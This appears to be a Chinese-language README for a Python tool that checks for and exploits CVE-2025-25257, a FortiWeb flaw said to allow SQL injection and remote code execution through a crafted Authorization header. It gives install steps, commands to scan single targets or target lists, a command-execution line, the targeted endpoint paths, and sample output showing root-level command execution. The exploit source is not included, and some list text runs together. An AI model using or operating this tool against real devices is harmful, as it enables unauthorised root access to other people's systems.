一个基于 Python 的工具,用于检测和利用 FortiWeb 设备中的 CVE-2025-25257 漏洞。该漏洞通过精心构造的 Authorization 标头实现 SQL 注入和远程代码执行。
CVE-2025-25257 是 FortiWeb 设备中的一个严重漏洞,允许:
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)检查单个目标:
python3 vuln_check.py -t https://target.com
从文件检查多个目标:
python3 vuln_check.py -l target.txt
exp.py)在易受攻击的目标上执行命令:
python3 exp.py -t https://target.com -c "id"
vuln_check.py - 主要漏洞检查器与利用工具exp.py - 用于易受攻击目标的命令执行工具target.txt - 目标示例列表(请替换为你自己的)vuln.txt - 输出文件,包含易受攻击的目标(扫描后生成)/api/fabric/device/status/cgi-bin/x.cgi该工具生成一个 vuln.txt 文件,包含:
示例输出:
# CVE-2025-25257 易受攻击的目标 - 2025-01-27 10:30:15
# 格式:[时间戳] 目标 - 命令输出
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
致谢: 0xbigshaq